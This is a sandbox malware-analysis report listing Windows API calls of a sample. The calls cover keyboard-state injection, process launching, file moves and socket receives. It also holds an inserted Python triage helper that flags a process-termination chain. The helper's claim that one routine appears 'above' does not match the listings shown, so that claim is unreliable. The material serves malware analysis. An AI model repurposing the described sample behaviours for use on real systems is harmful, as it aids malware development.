                          • Instruction ID: 6d9bba47c9625317b553b6d148cf1eb7d227241f3dcf9e01c3ac790c62dc19d0
                          • Opcode Fuzzy Hash: d3bebbadc258faf3f5baf65f53fa973c6ae15a10bbd1fdf81409567ec7a8650a
                          • Instruction Fuzzy Hash: 2CA199702042029FCB10EF54D889B6EBBE5BF95314F14881DF9969B2E2DB31E945CF82
                          APIs
                          • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0054C438,00000004,00000000,00000000,00000000), ref: 00512E9F
                          • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0054C438,00000004,00000000,00000000,00000000,000000FF), ref: 00512EE7
                          • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0054C438,00000004,00000000,00000000,00000000), ref: 0054C48B
                          • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0054C438,00000004,00000000,00000000,00000000), ref: 0054C4F7
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ShowWindow
                          • String ID:
                          • API String ID: 1268545403-0
                          • Opcode ID: 1ccdf2be821e6b1913580cb579b77d31ed14b72b9919b6ab835542fd20e15b2d
                          • Instruction ID: a0b158705d401eb398120a7d2fc23ef9df9c92c319b184330c37de91b0d66c9d
                          • Opcode Fuzzy Hash: 1ccdf2be821e6b1913580cb579b77d31ed14b72b9919b6ab835542fd20e15b2d
                          • Instruction Fuzzy Hash: AB412D306056809EEF758728C9C87FA7FDABBD2304F148A0DE447865A0D735A8E9E710
                          APIs
                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 00577505
                            • Part of subcall function 00530F16: std::exception::exception.LIBCMT ref: 00530F4C
                            • Part of subcall function 00530F16: __CxxThrowException@8.LIBCMT ref: 00530F61
                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 0057753C
                          • EnterCriticalSection.KERNEL32(?), ref: 00577558
                          • _memmove.LIBCMT ref: 005775A6
                          • _memmove.LIBCMT ref: 005775C3
                          • LeaveCriticalSection.KERNEL32(?), ref: 005775D2
                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 005775E7
                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00577606
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                          • String ID:
                          • API String ID: 256516436-0
                          • Opcode ID: a4a5f5828cfa747a5526a474393a878f5ee1422e95bf278d26772d48befe9aa3
                          • Instruction ID: cb8eed554b0e7695dc5199e1f58eb7e03b3fdd1f243b2e61ad698b892bb2ec07
                          • Opcode Fuzzy Hash: a4a5f5828cfa747a5526a474393a878f5ee1422e95bf278d26772d48befe9aa3
                          • Instruction Fuzzy Hash: 0F315471904209AFDB10DF54DC89EAEBB78FF85710F1480A5F904AB296D770DE15DBA0
                          APIs
                          • DeleteObject.GDI32(00000000), ref: 005965D8
                          • GetDC.USER32(00000000), ref: 005965E0
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 005965EB
                          • ReleaseDC.USER32(00000000,00000000), ref: 005965F7
                          • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00596633
                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00596644
                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00599417,?,?,000000FF,00000000,?,000000FF,?), ref: 0059667E
                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 0059669E
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                          • String ID:
                          • API String ID: 3864802216-0
                          • Opcode ID: c68add88ba8f4219a1383391d8c75cc14313502293087126f2c029c48b9eba12
                          • Instruction ID: 294a0cce908abb7f1ce1f9c8668106d1a599a5797858b26bb4f7f8390b7112ea
                          • Opcode Fuzzy Hash: c68add88ba8f4219a1383391d8c75cc14313502293087126f2c029c48b9eba12
                          • Instruction Fuzzy Hash: FE317872211214AFEF118F10CC8AFAA3FA9FF5A765F084055FE08AA291C6759855CBB4
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: _memcmp
                          • String ID:
                          • API String ID: 2931989736-0
                          • Opcode ID: d9f2aa4ae12ff8d670cb61780f913821d495e24e4f3a70728db98377f6068f5b
                          • Instruction ID: cb3471884cb02d373f4b4cd776cfa451549788f70449af3935f38f8c9f2a74e7
                          • Opcode Fuzzy Hash: d9f2aa4ae12ff8d670cb61780f913821d495e24e4f3a70728db98377f6068f5b
                          • Instruction Fuzzy Hash: E021CF71A016067BA62066298D42FBF3F5CBEA1798F004066FD47E7242FB50EE1186BD
                          APIs
                            • Part of subcall function 00514D37: __itow.LIBCMT ref: 00514D62
                            • Part of subcall function 00514D37: __swprintf.LIBCMT ref: 00514DAC
                            • Part of subcall function 0052436A: _wcscpy.LIBCMT ref: 0052438D
                          • _wcstok.LIBCMT ref: 0057F144
                          • _wcscpy.LIBCMT ref: 0057F1D3
                          • _memset.LIBCMT ref: 0057F206
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                          • String ID: X
                          • API String ID: 774024439-3081909835
                          • Opcode ID: 25b4bcc958405ee3a9780035f44a2454df72f09060479ca4fc0442341cbec626
                          • Instruction ID: b211111ac3f056d01f6c1e1bec975d9d2a562b222f9457229d5e24ca68af5bed
                          • Opcode Fuzzy Hash: 25b4bcc958405ee3a9780035f44a2454df72f09060479ca4fc0442341cbec626
                          • Instruction Fuzzy Hash: D9C18C74504712DFD714EF64E849AABBBE4BF95310F10892DF899972A2DB30EC45CB82
                          APIs
                          • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 005870B0
                          • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 005870D1
                          • WSAGetLastError.WSOCK32(00000000), ref: 005870E4
                          • htons.WSOCK32(?,?,?,00000000,?), ref: 0058719A
                          • inet_ntoa.WSOCK32(?), ref: 00587157
                            • Part of subcall function 0056B2CD: _strlen.LIBCMT ref: 0056B2D7
                            • Part of subcall function 0056B2CD: _memmove.LIBCMT ref: 0056B2F9
                          • _strlen.LIBCMT ref: 005871F4
                          • _memmove.LIBCMT ref: 0058725D
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                          • String ID:
                          • API String ID: 3619996494-0
                          • Opcode ID: 7848ab3765b08d84d7300db79ea774eeeee907e8354fc94ee0472d42b9ccc8de
                          • Instruction ID: 0e85f268404c543adc90fc76310134be0a92ce29868e2d2ca9ca6d5d2b1c6b2e
                          • Opcode Fuzzy Hash: 7848ab3765b08d84d7300db79ea774eeeee907e8354fc94ee0472d42b9ccc8de
                          • Instruction Fuzzy Hash: BC81D275108201ABD310FB64DC8AE6BBBA8FFC8714F144918F956AB2D2DB30ED41CB91
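Two of the routines listed above are worth decoding by hand rather than reading as raw API names: the routine at 0058EE55 pairs a Toolhelp32 process walk (the subcall at 00573FB5) with OpenProcess(00000001, ...) and TerminateProcess, and carries the SeDebugPrivilege string; the routine at 005870B0 imports wsock32 by ordinal, so the report prints `#17` instead of a name. The following Python is an added triage helper, not part of the Joe Sandbox report or of the analysed sample: it parses the bullet format of the "APIs" listings on this page, resolves wsock32 ordinals (ordinal 17 of wsock32.dll is recvfrom; its last argument 00000010 is a 16-byte sockaddr_in length, i.e. an IPv4 peer), expands the OpenProcess access mask (00000001 is PROCESS_TERMINATE), and flags the enumerate-open-terminate chain. The constant tables are taken from the Windows SDK headers; the chain heuristics and the two sample inputs (copied from the listings above) are this example's own. `FindCloseChangeNotification` in the subcall is most likely a label for CloseHandle, which shares that kernel32 export address; the helper leaves the name as reported.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# One bullet of an "APIs" listing, in the three shapes the report uses:
#   • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0058EE55
#   • Part of subcall function 00573FB5: Process32FirstW.KERNEL32(00000000,?), ref: 00573FE8
#   • _wcscat.LIBCMT ref: 0059729A
API_RE = re.compile(
    r"(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>\S+?)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})"
)

# OpenProcess access-right bits (winnt.h) and the ordinal exports of
# wsock32.dll that the report prints as '#N'.
PROCESS_ACCESS = {
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE", 0x0040: "PROCESS_DUP_HANDLE",
    0x0400: "PROCESS_QUERY_INFORMATION", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}
WSOCK32_ORDINALS = {1: "accept", 2: "bind", 3: "closesocket", 4: "connect",
                    9: "htons", 10: "inet_addr", 11: "inet_ntoa", 16: "recv",
                    17: "recvfrom", 18: "select", 19: "send", 20: "sendto",
                    23: "socket"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[Optional[int]]   # None where the report shows '?'
    ref: int                    # address of the call site
    subcall: Optional[int]      # callee address when the call sits in a sub-function


def parse_apis(text: str) -> List[ApiCall]:
    """Parse every API bullet in a block of report text."""
    calls = []
    for line in text.splitlines():
        m = API_RE.search(line)
        if not m:
            continue
        raw = m.group("args")
        args = [] if raw is None else [
            None if a.strip() == "?" else int(a, 16)
            for a in raw.split(",") if a.strip()
        ]
        sub = m.group("sub")
        calls.append(ApiCall(m.group("name"), m.group("module"), args,
                             int(m.group("ref"), 16), int(sub, 16) if sub else None))
    return calls


def resolve_name(call: ApiCall) -> str:
    """Turn a wsock32 ordinal import such as '#17' into its export name."""
    if call.module == "WSOCK32" and call.name.startswith("#"):
        return WSOCK32_ORDINALS.get(int(call.name[1:]), call.name)
    return call.name


def decode_access_mask(mask: int) -> List[str]:
    """Name the known PROCESS_* bits; any remainder is kept as hex."""
    names = [n for bit, n in PROCESS_ACCESS.items() if mask & bit]
    leftover = mask & ~sum(PROCESS_ACCESS)
    if leftover:
        names.append(f"0x{leftover:X}")
    return names


def triage(text: str) -> dict:
    """Parse one listing and report the behaviours a reviewer should notice."""
    calls = parse_apis(text)
    names = {resolve_name(c) for c in calls}
    findings = []
    masks = [c.args[0] for c in calls
             if c.name == "OpenProcess" and c.args and c.args[0] is not None]
    for m in masks:
        findings.append("OpenProcess access = " + "|".join(decode_access_mask(m)))
    enumerates = bool(names & {"Process32First", "Process32FirstW",
                               "Process32Next", "Process32NextW"})
    if ("CreateToolhelp32Snapshot" in names and enumerates
            and "TerminateProcess" in names and any(m & 0x1 for m in masks)):
        findings.append("process-kill loop: Toolhelp32 enumeration -> "
                        "OpenProcess(PROCESS_TERMINATE) -> TerminateProcess")
    if "recvfrom" in names and "inet_ntoa" in names:
        findings.append("datagram receive with peer address formatting "
                        "(recvfrom + inet_ntoa)")
    return {"calls": calls, "names": sorted(names), "findings": findings}


# Sample inputs copied from the two listings above.
SAMPLE_PROCESS_KILL = """\
  • Part of subcall function 00573FB5: CreateToolhelp32Snapshot.KERNEL32 ref: 00573FDA
  • Part of subcall function 00573FB5: Process32FirstW.KERNEL32(00000000,?), ref: 00573FE8
  • Part of subcall function 00573FB5: FindCloseChangeNotification.KERNEL32(00000000), ref: 005740B2
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0058EE55
• GetLastError.KERNEL32 ref: 0058EE68
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0058EE97
• TerminateProcess.KERNEL32(00000000,00000000), ref: 0058EF14
• GetLastError.KERNEL32(00000000), ref: 0058EF1F
• CloseHandle.KERNEL32(00000000), ref: 0058EF54
"""
SAMPLE_SOCKET = """\
• __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 005870B0
• #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 005870D1
• WSAGetLastError.WSOCK32(00000000), ref: 005870E4
• htons.WSOCK32(?,?,?,00000000,?), ref: 0058719A
• inet_ntoa.WSOCK32(?), ref: 00587157
"""

if __name__ == "__main__":
    for sample in (SAMPLE_PROCESS_KILL, SAMPLE_SOCKET):
        for finding in triage(sample)["findings"]:
            print(finding)
```

Run it on a whole "APIs" block pasted from the report; the `Part of subcall function` bullets are kept, with the callee address in `subcall`, because the kill chain here is only visible once the Toolhelp32 walk inside 00573FB5 is read together with the OpenProcess and TerminateProcess calls in the caller.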
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 021346539a557dad9e464effe16b6b3427b00146e680a2d22178d03cef473786
                          • Instruction ID: 209cd889fca2f8232b4f861607d0073dcf49324b77c32432834898970558af16
                          • Opcode Fuzzy Hash: 021346539a557dad9e464effe16b6b3427b00146e680a2d22178d03cef473786
                          • Instruction Fuzzy Hash: 52715D30900509FFEB04CF58CC49AEEBF79FF86314F148599FA15AA291C730AA91DB64
                          APIs
                          • IsWindow.USER32(01235480), ref: 0059B7D8
                          • IsWindowEnabled.USER32(01235480), ref: 0059B7E4
                          • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 0059B8C8
                          • SendMessageW.USER32(01235480,000000B0,?,?), ref: 0059B8FF
                          • IsDlgButtonChecked.USER32(?,?), ref: 0059B93C
                          • GetWindowLongW.USER32(01235480,000000EC), ref: 0059B95E
                          • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0059B976
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                          • String ID:
                          • API String ID: 4072528602-0
                          • Opcode ID: 2f36e689639bb0060d36ab2b6b627381e5ac6dc2b673f3fda8c71a2a44cc7c40
                          • Instruction ID: 74c27f718c1c14062cfbd565bcbeb03ed9e2745c386ae81145f0094b46fdc14c
                          • Opcode Fuzzy Hash: 2f36e689639bb0060d36ab2b6b627381e5ac6dc2b673f3fda8c71a2a44cc7c40
                          • Instruction Fuzzy Hash: 40719E74A01208AFFF209F94DAD4FAA7FB9FF89300F14445AE955972A1C731A855DB10
                          APIs
                          • _memset.LIBCMT ref: 0058F8F9
                          • _memset.LIBCMT ref: 0058F9C2
                          • ShellExecuteExW.SHELL32(?), ref: 0058FA07
                            • Part of subcall function 00514D37: __itow.LIBCMT ref: 00514D62
                            • Part of subcall function 00514D37: __swprintf.LIBCMT ref: 00514DAC
                            • Part of subcall function 0052436A: _wcscpy.LIBCMT ref: 0052438D
                          • GetProcessId.KERNEL32(00000000), ref: 0058FA7E
                          • CloseHandle.KERNEL32(00000000), ref: 0058FAAD
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                          • String ID: @
                          • API String ID: 3522835683-2766056989
                          • Opcode ID: d667b9932b3ab2aac5e019873916aed9fdcb456ce5b236df4b690b32480c71cf
                          • Instruction ID: 66f755e2fba0320c51c7e33e7b80a1ea916e87ef55b10c7e6d417e0342024d4c
                          • Opcode Fuzzy Hash: d667b9932b3ab2aac5e019873916aed9fdcb456ce5b236df4b690b32480c71cf
                          • Instruction Fuzzy Hash: 95619D75A0061A9FCB14EF94D4859AEBBF5FF89310F108469E859AB391CB30AD81CF90
                          APIs
                          • GetParent.USER32(?), ref: 005715F7
                          • GetKeyboardState.USER32(?), ref: 0057160C
                          • SetKeyboardState.USER32(?), ref: 0057166D
                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 0057169B
                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 005716BA
                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 00571700
                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00571723
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: MessagePost$KeyboardState$Parent
                          • String ID:
                          • API String ID: 87235514-0
                          • Opcode ID: 31ae25816fbcdef1cd1da864dc1988e5091b4c80f3adad20ede4d2869a2c2405
                          • Instruction ID: 4c947e2c19e3d69e8f6abb7151399b041cd1fca8e32d4ac06e5742cc5177e182
                          • Opcode Fuzzy Hash: 31ae25816fbcdef1cd1da864dc1988e5091b4c80f3adad20ede4d2869a2c2405
                          • Instruction Fuzzy Hash: AD51D5A0504BD13DFB36462C9C59BB67FA9BB06304F0CC589E1DD498C2C298EC98F758
                          APIs
                          • GetParent.USER32(00000000), ref: 00571410
                          • GetKeyboardState.USER32(?), ref: 00571425
                          • SetKeyboardState.USER32(?), ref: 00571486
                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 005714B2
                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 005714CF
                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00571513
                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00571534
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: MessagePost$KeyboardState$Parent
                          • String ID:
                          • API String ID: 87235514-0
                          • Opcode ID: 68812bbede0404ae5b51a40f2cdf3d0cec30ed8d9a3d12dba4ee8724e2d54fa8
                          • Instruction ID: 49c69637d241600866dd71b2576ca8830f6c5bdb91a6e2161032a7158febc17d
                          • Opcode Fuzzy Hash: 68812bbede0404ae5b51a40f2cdf3d0cec30ed8d9a3d12dba4ee8724e2d54fa8
                          • Instruction Fuzzy Hash: 4D51E4B0554AD13DFB3682389C55BB6BFAA7B46700F0CC489E1DE464C2D294EC88FB58
                          APIs
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: _wcsncpy$LocalTime
                          • String ID:
                          • API String ID: 2945705084-0
                          • Opcode ID: 5682bca27628ff3676444c9bfe3c12aea6ac90fbb8b9a8bdbbf231eed059275b
                          • Instruction ID: ca95e3df062819270840758f04c1bb07c2e05dcb8ea40c5fa0fcc1a1f0a17027
                          • Opcode Fuzzy Hash: 5682bca27628ff3676444c9bfe3c12aea6ac90fbb8b9a8bdbbf231eed059275b
                          • Instruction Fuzzy Hash: 73419EA5C2061575CB11EBA4888E9DFBBA8BF44310F508866F519E3221F774E309C7A9
                          APIs
                            • Part of subcall function 00574A30: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,005739F7,?), ref: 00574A4D
                            • Part of subcall function 00574A30: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,005739F7,?), ref: 00574A66
                          • lstrcmpiW.KERNEL32(?,?), ref: 00573A17
                          • _wcscmp.LIBCMT ref: 00573A33
                          • MoveFileW.KERNEL32(?,?), ref: 00573A4B
                          • _wcscat.LIBCMT ref: 00573A93
                          • SHFileOperationW.SHELL32(?), ref: 00573AFF
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                          • String ID: \*.*
                          • API String ID: 1377345388-1173974218
                          • Opcode ID: 9b4b8bea0c7e6b6602944229e89828fa42c5cb42495ac91840401e09155ad56e
                          • Instruction ID: 7d7eb6965d6f8df9e87a0548b93ddf345ae53838f0b655894b1653254302f805
                          • Opcode Fuzzy Hash: 9b4b8bea0c7e6b6602944229e89828fa42c5cb42495ac91840401e09155ad56e
                          • Instruction Fuzzy Hash: 0941AF71508345AEC751EB60E846AEBBBECBF89350F00492EB48DC3151EB34D689EB56
                          APIs
                          • _memset.LIBCMT ref: 00597697
                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0059773E
                          • IsMenu.USER32(?), ref: 00597756
                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0059779E
                          • DrawMenuBar.USER32 ref: 005977B1
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
